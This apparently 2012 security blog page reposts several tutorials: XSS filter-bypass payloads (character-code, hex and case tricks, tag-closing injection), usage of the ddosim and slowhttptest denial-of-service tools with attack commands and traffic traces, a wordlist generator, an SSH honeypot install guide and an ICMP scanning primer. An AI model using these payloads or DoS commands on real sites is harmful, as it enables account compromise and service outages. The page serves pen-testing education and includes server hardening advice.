Jan 13, 2012

Bypassing the XSS Filters : Advanced XSS Tutorials for Web application Pen Testing

Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability. For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become
<script>alert(>xss detected<)</script>
Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS.  In this case, we can use some tricks to bypass the filter.  Here i am going to cover that only.

1.Bypassing magic_quotes_gpc

The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \  with a backslash automatically.
For Eg:
<scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.

This is well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
For Eg:  alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so the script will become <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>.  In this case there is no "(quotes) or '(single quotes) or / so the filter can't filter this thing.  Yes, it will successfully run the script.
String.fromCharCode() is a javascript function that converts ASCII value to Characters.

How to convert to ASCII values?

There are some online sites that converts to ASCII character. But i suggest you to use Hackbar Mozilla addon .

After installing hackbar add on ,press F9.  It will open the small box above the url bar. click the XSS->String.fromCharCode()

Now it will popup small window. enter the code for instance alert("Hi").  click ok button.  Now we got the output.

copy the code into the <script></script> inside and insert in the vulnerable sites

For eg: 
hxxp://vulnerable-site/search?q=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>

2.HEX Encoding

we can encode our whole script into HEX code so that it can't be filtered.
For example:  <script>alert("Hi");</script> can be convert to HEX as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
 Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/

3.Bypassing using Obfuscation

Some website admin put the script,alert in restricted word list.  so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation). 
For eg:
<ScRipt>ALeRt("hi");</sCRipT>

This bypass technique rarely works but giving trial is worth.

4. Closing Tag

Sometimes putting "> at the beginning of the code will work.

"><script>alert("Hi");</script>

This will end the previous opened tag and open our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Hi");</script>

Source: http://www.breakthesecurity.com/2011/12/bypassing-xss-filters-advanced-xss.html


If you like my blog, Please Donate Me

ddosim v0.2 (Application Layer DDOS Simulator)

Hack websites by using ddosim v0.2 (Application Layer DDOS Simulator)

DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server). Can be used only in a laboratory environment to test the capacity of the target server to handle application specific DDOS attacks.
Features
  • HTTP DDoS with valid requests
  • HTTP DDoS with invalid requests (similar to a DC++ attack)
  • SMTP DDoS
  • TCP connection flood on random port
In order to simulate such an attack in a lab environment we need to setup a network like this:
On the victim machine ddosim creates full TCP connections – which are only simulated connections on the attacker side.
There are a lot of options that make the tool  quite flexible:
Usage: ./ddosim
-d IP                   Target IP address
-p PORT            Target port
[-k NET]             Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME]      Output interface name
[-c COUNT]       Number of connections to establish
[-w DELAY]       Delay (in milliseconds) between SYN packets
[-r TYPE]             Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS]   Number of threads to use when sending packets (default 1)
[-n]                       Do not spoof source address (use local address)
[-v]                       Verbose mode (slower)
[-h]                       Print this help message

Source: http://hackingtricks.in/2012/01/hack-websites-by-using-ddosim-v0-2-application-layer-ddos-simulator-2.html


If you like my blog, Please Donate Me

Jan 11, 2012

Kojoney SSH Honeypot, installation (CentOS) and configuration

 It is a low interaction honeypot that emulates the SSH service, and it’s written in Python like Kippo.  
1. First of all, since we’ll still want to be able to connect to our own machine, we must change the default SSH port 22 to something else:

vi /etc/ssh/sshd_config
 
You need to uncomment the “#Port 22″ line and change “22″ to whatever you want (take note of it), let’s say 2222.

Restart the ssh server for the change to take effect:
/etc/init.d/sshd restart
 
At this stage you might want to logout of the system and connect again using the new port.

2. Let’s update the system and install required software:
yum update
 
Kojoney requires the following packages that can be installed through yum:
yum install gcc python python-devel
 
3. Download Kojoney itself:
cd /tmp
wget http://dfn.dl.sourceforge.net/project/kojoney/kojoney-0.0.4.2.tar.gz
tar -xvf kojoney-0.0.4.2.tar.gz
 
4. (OPTIONAL) The Iran Honeynet Project has created some updated packages to use with Kojoney making its geolocation feature better and also adding new sections to the report file. It would be good to install them:
cd /tmp
wget http://www.honeynet.ir/software/kojoney-update/TwisteConch-0.6.0.tar.gz
wget http://www.honeynet.ir/software/kojoney-update/IP-Country-2.27.tar.gz
wget http://www.honeynet.ir/software/kojoney-update/Geography-Countries-2009041301.tar.gz
wget http://www.honeynet.ir/software/kojoney-update/kojreport
/bin/cp -vf /tmp/TwisteConch-0.6.0.tar.gz /tmp/kojoney/libs/
/bin/cp -vf /tmp/kojreport /tmp/kojoney/reports/
rm -rfv /tmp/kojoney/reports/ip_country/*
/bin/cp -vf /tmp/IP-Country-2.27.tar.gz /tmp/kojoney/reports/ip_country/
/bin/cp -vf /tmp/Geography-Countries-2009041301.tar.gz /tmp/kojoney/reports/ip_country/
 
The above files are also stored here for backup purposes: kojoney-update-files
5. Let’s install Kojoney and run it:
cd /tmp/kojoney
sh INSTALL.sh
 
I got an error here because the script wasn’t able to locate the man directory. Hopefully it asks for it so type the following: /usr/share/man/man1 (“1″ is not a typo) if required.
echo "/etc/init.d/kojoney start" >> /etc/rc.local
/etc/init.d/kojoney start
 
You can check that everything is working alright by using
ps aux | grep kojoney
 
where you should see something like:
root  1573  0.0  1.4  14904  7748 ?  S  Jan09  0:33 python /usr/bin/kojoneyd
 
and also:
netstat -antp
 
where you should see something like this:
Proto Recv-Q Send-Q Local Address  Foreign Address  State   PID/Program name
tcp        0      0  0.0.0.0:22     0.0.0.0:*       LISTEN   1573/python
 
6. Where is what? Kojoney itself is installed at “/usr/share/kojoney/” by default. You can go there to have a look at its source files. The log file it creates is located at “/var/log/honeypot.log“. Kojoney already has a built-in list of common username and password combinations, stored at “/etc/kojoney/fake_users”. If somebody enters a combo found in this file, he’s got access.

7. There is a script distributed with it to make log parsing and statistics display easy. It is called kojreport and you can test it like this:
/usr/share/kojoney/kojreport /var/log/honeypot.log 0 0 1 > /tmp/report.txt
cat /tmp/report.txt
 
8. Kojoney has some problems like Kippo. The responses for various commands are hardcoded and you might need to change them. You can alter the existing ones or create your own as well.
There are specifically two files you need to pay attention to. Both of them are located at the base directory (/usr/share/kojoney/) and are called coret_fake.py and coret_honey.py.
“coret_fake.py” includes all the responses to various commands. I would suggest changing at least the following: FAKE_SSH_SERVER_VERSION, FAKE_OS (you own or uncomment another from the list), FAKE_SHELL and FAKE_W. 

The second file, “coret_honey.py” is used when you want to add responses for new commands. You first write your response constant variable into “coret_fake.py” and then add it to “coret_honey.py”. For example, if I was to create a response for the “uptime” command:
a) I would write something like:
FAKE_UPTIME = " 02:32:28 up 1 day, 21:20,  1 user,  load average: 0.00, 0.00, 0.06"
into “coret_fake.py” and

b) I would add it to “coret_honey.py” file (lines 6 & 7 below):
if uname_re.match(data):
        transport.write(FAKE_OS)
    elif ls_re.match(data):
        for line in FAKE_LS:
            transport.write(line + '\r\n')
    elif data == "uptime":
        transport.write(FAKE_UPTIME)
And of course we need to restart the Kojoney service for the changes to take effect:
/etc/init.d/kojoney stop
/etc/init.d/kojoney start
 
9. Trying out Kojoney was not really in my plans (since I have invested time and effort in Kippo) until I found these two excellent resources that inspired me to give it a try: How To Set Up Kojoney SSH Honeypot On CentOS 5.5, Using and Extending Kojoney SSH Honeypot

Source: http://bruteforce.gr/kojoney-ssh-honeypot-installation-centos-and-configuration.html


If you like my blog, Please Donate Me

Word List Generator

wlg: Word List Generator 
version: 0.5
coded by white_sheep

site: http://www.marcorondini.eu - http://www.ihteam.net
twitter: http://www.twitter.com/white__sheep
 
Option
 -h [ --help ]                         produce help message
 -v [ --version ]                      show version
 -r [ --credits ]                      show credits

 -e [ --extract ] arg                   set string to extract
 -c [ --compat ] arg                    set counter to compat

 -g [ --gen ]                           start wordlist generator

 -f [ --filename ] arg                  set filename 

 -C [ --charset ] arg (=ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvwxyz0123456789"_-.,:;!%&/()=?'^*+][@)
                                        set charset

 -o [ --using_word ]                    using word
 -w [ --start_word ] arg                set start word
 -W [ --end_word ] arg                  set end word

 -n [ --using_index ]                   using index
 -i [ --start_int ] arg (=0)            set start counter
 -I [ --end_int ] arg (=0)              set end counter

 -l [ --using_length ]                  using length
 -m [ --min_length ] arg (=0)           set min word length
 -M [ --max_length ] arg (=0)           set max word length 
 
extract function: return iteration number 

wlg -e ciao
15669092

compat function: return string about iteration number

wlg -c 15669092
ciao

gen function: generate wordlist
    • using word index
        wlg -g -o -w ciao ( infinite wordlist creation )
        wlg -g -o -w ciao -W ciaoc ( wordlist between ciao and ciaoc )
    • using iteration index
        wlg -g -n -i 10000000000000000000 ( infinite wordlist creation )
        wlg -g -n -i 100 -I 123123123123( wordlist between 100 and 123123123123 iteration number )
    • using word length
        wlg -g -l -m 1 ( infinite wordlist creation )
        wlg -g -l -m 3 -M 8 ( wordlist with min length 1 and max length 8 )
Using file for output 
    wlg -g -l -m 1 -f wl.txt

Set charset
    wlg -g -l -m 1 -C 0123456789 -f wl.txt  

Source: https://github.com/whitesheep/wlg

If you like my blog, Please Donate Me

Jan 10, 2012

Slowhttptest - Application Layer DoS attack simulator

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks.
It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Slow Read DoS attack aims the same resources as slowloris and slow POST, but instead of prolonging the request, it sends legitimate HTTP request and reads the response slowly. 

Details

Attack exploits the fact that most of modern web servers are not limiting the connection duration if there is a data flow going on, and with possiblity to prolong TCP connection virtually forever with zero or minimal data flow by manipulating TCP receive window size value, it is possible to acquire concurent connections pool of the application. Possibility to prolong TCP connection is described in several vulnerability reports: MS09-048, CVE-2008-4609, CVE-2009-1925, CVE-2009-1926 .
Prerequisites for the successful attack are: - victim server should accept connections with advertised window smaller than server socket send buffer, the smaller the better – attacker needs to request a resource that doesn't fit into server's socket send buffer, which is usually between 64K and 128K. To fill up server socket's send buffer for sure, consider using HTTP pipelining (-k argument of slowhttptest)
slowhttptest controls the incoming data rate by manipulating receive buffer size through SO_RCVBUF socket option and by varying reading rate from it by application. Note, that different operating systems might have different behavior. For example, OSX uses the value we set SO_RCVBUF to in initial SYN packet, while Linux systems double this value (to allow space for bookkeeping overhead) when it is set using setsockopt. Minimum doubled value for Linux systems is 256 or the first value of /proc/sys/net/ipv4/tcp_rmem, whichever is larger. Also, changing receive buffer size on OSX doesn't work if connecting to localhost.
For SSL connections, slow reading from receive buffer engages after SSL handshake is finished. However, as initial window size is smaller than usual, handshake might require more TCP packets and last longer than usual.

Example

Actual example of usage: 

./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://myseceureserver/resources/index.html -p 3

-X starts Slow Read test with 1000 connections, creating 200 connections per second. Initial SYN packet for every connection would have random advertised window size value between 512 and 1024, and application would read 32 bytes every 5 seconds from each socket's receive buffer. To multiply overall response size, we use pipeline factor 3 to request the same resource 3 times per socket. Probe connection would consider server DoSed, if no response was received after 3 seconds. 

Let me remind you what slowloris and slow POST are aiming to do: A Web server keeps its active connections in a relatively small concurrent connection pool, and the above-mentioned attacks try to tie up all the connections in that pool with slow requests, thus causing the server to reject legitimate requests, as in first reastaurnt scenario.

The idea of the attack I implemented is pretty simple: Bypass policies that filter slow-deciding customers, send a legitimate HTTP request and read the response slowly, aiming to keep as many connections as possible active. Sounds too easy to be true, right?

Crafting a Slow Read


Let’s start with a simple case, and send a legitimate HTTP request for a resource without reading the server’s response from the kernel receive buffer.
We craft a request like the following:

GET /img/delivery.png HTTP/1.1
Host: victim
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) Presto/2.9.168 Version/11.50
Referer: http://code.google.com/p/slowhttptest/

And the server replies with something like this:

HTTP/1.1 200 OK
Date: Mon, 19 Dec 2011 00:12:28 GMT
Server: Apache
Last-Modified: Thu, 08 Dec 2011 15:29:54 GMT
Accept-Ranges: bytes
Content-Length: 24523
Content-Type: image/png
?PNG

The simplified tcpdump output looks like this:

09:06:02.088947 IP attacker.63643 > victim.http: Flags [S], seq 3550589098, win 65535, options [mss 1460,nop,wscale 1,nop,nop,TS val 796586772 ecr 0,sackOK,eol], length 0
09:06:02.460622 IP victim.http > attacker.63643: Flags [S.], seq 1257718537, ack 3550589099, win 5792, options [mss 1460,sackOK,TS val 595199695 ecr 796586772,nop,wscale 6], length 0
09:06:02.460682 IP attacker.63643 > victim.http: Flags [.], ack 1, win 33304, length 0
09:06:02.460705 IP attacker.63643 > victim.http: Flags [P.], seq 1:219, ack 1, win 33304, length 218 
09:06:02.750771 IP victim.http > attacker.63643: Flags [.], ack 219, win 108, length 0
09:06:02.762162 IP victim.http > attacker.63643: Flags [.], seq 1:1449, ack 219, win 108, length 1448
09:06:02.762766 IP victim.http > attacker.63643: Flags [.], seq 1449:2897, ack 219, win 108, length 1448
09:06:02.762799 IP attacker.63643 > victim.http: Flags [.], ack 2897, win 31856, length 0
...
...
09:06:03.611022 IP victim.http > attacker.63643: Flags [P.], seq 24617:24738, ack 219, win 108, length 121 
09:06:03.611072 IP attacker.63643 > victim.http: Flags [.], ack 24738, win 20935, length 0
09:06:07.757014 IP victim.http > attacker.63643: Flags [F.], seq 24738, ack 219, win 108, length 0
09:06:07.757085 IP attacker.63643 > victim.http: Flags [.], ack 24739, win 20935, length 0
09:09:54.891068 IP attacker.63864 > victim.http: Flags [S], seq 2051163643, win 65535, length 0

For those who don’t feel like reading tcpdump’s output:  We established a connection; sent the request; received the response through several TCP packets sized 1448 bytes because of Maximum Segment Size that the underlying communication channel supports; and finally, 5 seconds later, we received the TCP packet with the FIN flag.

Everything seems normal and expected. The server handed the data to its kernel level send buffer, and the TCP/IP stack took care of the rest. At the client, even while the application had not read yet from its kernel level receive buffer, all the transactions were completed on the network layer.

What if we try to make the client’s receive buffer very small?

We sent the same HTTP request and server produced  the same HTTP response, but tcpdump produced much more interesting results:

13:37:48.371939 IP attacker.64939 > victim.http: Flags [S], seq 1545687125, win 28, options [mss 1460,nop,wscale 0,nop,nop,TS val 803763521 ecr 0,sackOK,eol], length 0
13:37:48.597488 IP victim.http > attacker.64939: Flags [S.], seq 3546812065, ack 1545687126, win 5792, options [mss 1460,sackOK,TS val 611508957 ecr 803763521,nop,wscale 6], length 0
13:37:48.597542 IP attacker.64939 > victim.http: Flags [.], ack 1, win 28, options [nop,nop,TS val 803763742 ecr 611508957], length 0
13:37:48.597574 IP attacker.64939 > victim.http: Flags [P.], seq 1:236, ack 1, win 28, length 235
13:37:48.820346 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0
13:37:49.896830 IP victim.http > attacker.64939: Flags [P.], seq 1:29, ack 236, win 98, length 28
13:37:49.896901 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:37:51.119826 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:37:51.119889 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:37:55.221629 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:37:55.221649 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:37:59.529502 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:37:59.529573 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:38:07.799075 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:38:07.799142 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:38:24.122070 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:38:24.122133 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:38:56.867099 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:38:56.867157 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:40:01.518180 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:40:01.518222 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:42:01.708150 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:42:01.708210 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:44:01.891431 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:44:01.891502 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:46:02.071285 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:46:02.071347 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0
13:48:02.252999 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0 
13:48:02.253074 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0,  length 0
13:50:02.436965 IP victim.http > attacker.64939: Flags [.], ack 236, win 98, length 0
13:50:02.437010 IP attacker.64939 > victim.http: Flags [.], ack 29, win 0, length 0

In the initial SYN packet, the client advertised its receive window size as 28 bytes. The server sends the first 28 bytes to the client and that’s it! The server keeps polling the client for space available at progressive intervals until it reaches a 2-minute interval, and then keeps polling at that interval, but keeps receiving win 0.

This is already promising: if we can prolong the connection lifetime for several minutes, it’s not that bad. And we can have more fun with thousands of connections! But fun did not happen. Let’s see why: Once the server received the request and generated the response, it sends the data to the socket, which is supposed to deliver it to the end user. If the data can fit into the server socket’s send buffer, the server hands the entire data to the kernel and forgets about it. That’s what happened with our last test.

What if we make the server keep polling the socket for write readiness? We get exactly what we wanted: Denial of Service.

Let’s summarize the prerequisites for the DoS:
  • We need to know the server’s send buffer size and then define a smaller-sized client receive buffer. TCP doesn’t advertise the server’s send buffer size, but we can assume that it is the default value, which is usually between 65Kb and 128Kb. There’s normally no need to have a send buffer larger than that.
  • We need to make the server generate a response that is larger than the send buffer. With reports indicating the Average Web Page Approaches 1MB, that should be fairly easy. Load the main page of the victim’s Web site in your favorite WebKit-based browser like Chrome or Safari and pick the largest resource in Web Inspector.
http://dum21w3618van.cloudfront.net/images/slowread/fig1.png


If there are no sufficiently large resources on the server, but it supports HTTP pipelining, which many Web servers do, then we can multiply the size of the response to fill up the server’s send buffer as much as we need by re-requesting same resource several times using the same connection.

For example, here’s a screenshot of mod_status on Apache under attack:

http://dum21w3618van.cloudfront.net/images/slowread/fig2.jpg

As you can see, all connections are in the WRITE state with 0 idle workers.

Installation

The tool is distributed as portable package, so just download the latest tarball from Downloads section, extract, configure, compile, and install:
$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install
Where PREFIX must be replaced with the absolute path where slowhttptest tool should be installed.
You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.

Full list of configurable options is the following:
-a startstart value of ranges-specifier for range header test
-b byteslimit of range-specifier for range header test
-c number of connectionslimited to 1024
-H, B, R or Xspecify to slow down in headers section or in message body, -R enables range test, -X enables slow read test
-ggenerate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html, where xxx is the time and date
-i secondsinterval between follow up data in seconds, per connection
-k pipeline factornumber of times to repeat the request in the same connection for slow read test if server supports HTTP pipe-lining.
-l secondstest duration in seconds
-n secondsinterval between read operations from receive buffer
-o filecustom output file path and/or name, effective if -g is specified
-p secondstimeout to wait for HTTP response on probe connection, after which server is considered inaccessible
-r connections per secondconnection rate
-s bytesvalue of Content-Length header, if -B specified
-t verbcustom verb to use
-u URLtarget URL, the same format you type in browser, e.g https://host[:port]/
-v levelverbosity level of log 0-4
-w bytesstart of range the advertised window size would be picked from
-x bytesmax length of follow up data
-y bytesend of range the advertised window size would be picked from
-z bytesbytes to read from receive buffer with single read() operation
Example of usage in slow message body mode:
./slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode:
./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Output

Depends on verbosity level, output can be either as simple as heartbeat message generated every 5 seconds showing status of connections with verbosity level 1, or full traffic dump with verbosity level 4.
-g option would generate both CSV file and interactive HTML based on Google Chart Tools.
Here is a sample screenshot of generated HTML page 

How to Protect Against Slow HTTP Attacks

Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.

In this article, I describe several simple steps to protect against slow HTTP attacks and to make the attacks more difficult to execute.

Previous articles in the series cover:

Protection Strategies


To protect your Web server against slow HTTP attacks, I recommend the following:
  • Reject / drop connections with HTTP methods (verbs) not supported by the URL.
  • Limit the header and message body to a minimal reasonable length. Set tighter URL-specific limits as appropriate for every resource that accepts a message body.
  • Set an absolute connection timeout, if possible. Of course, if the timeout is too short, you risk dropping legitimate slow connections; and if it’s too long, you don’t get any protection from attacks. I recommend a timeout value based on your connection length statistics, e.g. a timeout slightly greater than median lifetime of connections should satisfy most of the legitimate clients.
  • The backlog of pending connections allows the server to hold connections it’s not ready to accept, and this allows it to withstand a larger slow HTTP attack, as well as gives legitimate users a chance to be served under high load. However, a large backlog also prolongs the attack, since it backlogs all connection requests regardless of whether they’re legitimate. If the server supports a backlog, I recommend making it reasonably large to so your HTTP server can handle a small attack.
  • Define the minimum incoming data rate, and drop connections that are slower than that rate. Care must be taken not to set the minimum too low, or you risk dropping legitimate connections.

Server-Specific Recommendations


Applying the above steps to the HTTP servers tested in the previous article indicates the following server-specific settings:

Apache

  • Using the <Limit> and <LimitExcept> directives to drop requests with methods not supported by the URL alone won’t help, because Apache waits for the entire request to complete before applying these directives. Therefore, use these parameters in conjunction with the LimitRequestFields, LimitRequestFieldSize, LimitRequestBody, LimitRequestLine, LimitXMLRequestBody directives as appropriate. For example, it is unlikely that your web app requires an 8190 byte header, or an unlimited body size, or 100 headers per request, as most default configurations have. 
  • Set reasonable TimeOut and KeepAliveTimeOut directive values. The default value of 300 seconds for TimeOut is overkill for most situations.
  • ListenBackLog’s default value of 511 could be increased, which is helpful when the server can’t accept connections fast enough.
  • Increase the MaxRequestWorkers directive to allow the server to handle the maximum number of simultaneous connections.
  • Adjust the AcceptFilter directive, which is supported on FreeBSD and Linux, and enables operating system specific optimizations for a listening socket by protocol type. For example, the httpready Accept Filter buffers entire HTTP requests at the kernel level.

A number of Apache modules are available to minimize the threat of slow HTTP attacks. For example, mod_reqtimeout’s RequestReadTimeout directive helps to control slow connections by setting timeout and minimum data rate for receiving requests.

I also recommend switching apache2 to experimental Event MPM mode where available.  This uses a dedicated thread to handle the listening sockets and all sockets that are in a Keep Alive state, which means incomplete connections use fewer resources while being polled.

Nginx


lighttpd

  • Restrict request verbs using the $HTTP["request-method"] field in the configuration file for the core module (available since version 1.4.19).
  • Use server.max_request-size to limit the size of the entire request including headers.
  • Set server.max-read-idle to a reasonable minimum so that the server closes slow connections. No absolute connection timeout option was found.

IIS 6


IIS 7

  • Limit request attributes is through the <RequestLimits> element, specifically the maxAllowedContentLength, maxQueryString, and maxUrl attributes.
  • Set <headerLimits> to configure the type and size of header your web server will accept.
  • Tune the connectionTimeout, headerWaitTimeout, and minBytesPerSecond attributes of the <limits> and <WebLimits> elements to minimize the impact of slow HTTP attacks.


Source: https://code.google.com/p/slowhttptest/

If you like my blog, Please Donate Me

Howto: Beginning Web Pen Testing: ICMP Scans


Great post from Sketchymoose



Got Hacme Shipping VM up and running, and the link I posted last post about the setup made life so much easier. In addition to the steps in the tutorial, make sure you also install the .NET Framework 2.0, which can be grabbed here. And there is a typo in the tutorial, if you need to access the ColdFusion via the web-broswer yourself, go to:
 http://127.0.0.1/CFIDE/administrator/index.cfm
Oh and make sure you have enough space on your VM, you can expand the space of your VM via the command line vdiskmanager. 15 GB should suffice, 8GB is not enough (I found out the hard way).

So these next few posts will be about scans.I know I know scanning is
so -boring- right?! However, what did I say before? If you do not understand the basics and the versatility of your toolkit, you are missing data. Also, it never looks good when someone asks "Why did you try that?" and your response is "Because it was the example in the book and I thought that was good enough." Sorry guys, but you gotta start at the beginning :) I also do not know who my audience is out there in the interwebs, so I figure start small and work my way up to more fun things (its always good for a refresher right?)

Different operating systems respond to scans differently, when Windows XP says 'open' Windows 7 may say filtered. The key is understanding the scan you are running, and then examining the results to determine what it means. The way a machine responds to scan probes is also another way of determining the OS of the host you are scanning against (also known as fingerprinting).  That being said, I am not going to go thru all the scans nmap has to offer nor will I break each packet down to every bit and byte, try them on your own networks and see what works!
ICMP Scanning
ICMP stands for Internet Control Message Protocol. This is generally what you run in your internal network when troubleshooting connectivity problems. This is also why you should never allow ICMP responses going outside your network, as it helps an attacker determine your internal network. Let's see a simple example of ICMP ECHO Request, the most common ICMP packet.

ICMP ECHO command
 An ICMP Echo request packet  is known as 'Type 8' and a reply is Type '0'. This can be seen in the ICMP packet via wireshark or any handy packet sniffer program.

ICMP Request - Type 8 is highlighted


ICMP Reply - Type 0 is highlighted

Ok so lets go back to our command output, we see a TTL field. What is that? Well TTL stand for Time To Live, and it is required for ICMP packets. What it is is a number which gets decremented by 1 every time the packet goes thru a router (known as a 'hop') to get to its destination. The default TTL for Windows XP is 128  (many OS are different, see here for a list). Our TTL is... 128, so that means the packet did not have to go thru any router to get somewhere, it went straight to the destination (so we are definitely on the same network!). By the way, the TTL is another method to help determine the Operating System.

Let's look at a more 'legitimate' ping.

So here we have an ICMP packet going to www.google.com. As you can see, this took a bit longer then our first request, but more importantly, look at the TTL, its definitely no where near 128! TTL becomes more interesting when trying to map for firewall, internet gateways, and routers as it shows you how packets are routed to hosts on a network (using utilities like tracert).

I am going to briefly touch on
ICMP broadcast messages. If you are doing an internal network assessment of a company and you send an ICMP broadcast packet to the broadcast address, what do you do if  nothing comes up? Pack up and leave? No! Again, different OS respond differently to different requests. For example Windows by default does not respond to ICMP broadcast requests, however Solaris on a whole does respond. So again, you can't just do one scan and expect to grab everything.

So before I wrap up for today, I am going to touch on a few other ICMP scans:


TimeStampRequest
(Type 13) and TimeStamp Reply (Type14): Asks the machine for its current time (based on milliseconds from midnight GMT). If it responds... well you know it is alive AND you know roughly where in the world the IP is. So on my backtrack5 box I ran the following command:
ping -T tsonly 192.168.0.9
The '-T' switch  specifies the timestamp option, and all I want is timestamps. This gave me the following answer:
64 bytes from 192.168.0.9: icmp_seq=1 ttl=128 time=1.50 ms
TS:     74834377 absolute
If you take 74834377 milliseconds and do some maths on it, that gets you the time of about 2047 or 8:47pm, which is what time it is now in GMT :)

AddressMaskRequest
(Type 17) and Reply (Type 18): Used when asking for the subnet mask of an interface. Again if it responds, you got a live host (and now know the broadcast address if you didn't already).

So how to get these scans going in
nmap? If you just type 'nmap' on the command line you should get a list of all its parameters. However here are the ones I discussed today.

-PE (ICMP Echo), -PP (ICMP Timestamp) and -PM (ICMP Netmask Discovery)


So get out there, fire up you favourite scanning tool and start playing with the different Host Discovery Scans. What can you see? Do some scan miss some things that others pick up on? Why do you think that is? Get wireshark going and look at the packets... the more you know!


Additional Links:


If you like my blog, Please Donate Me
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |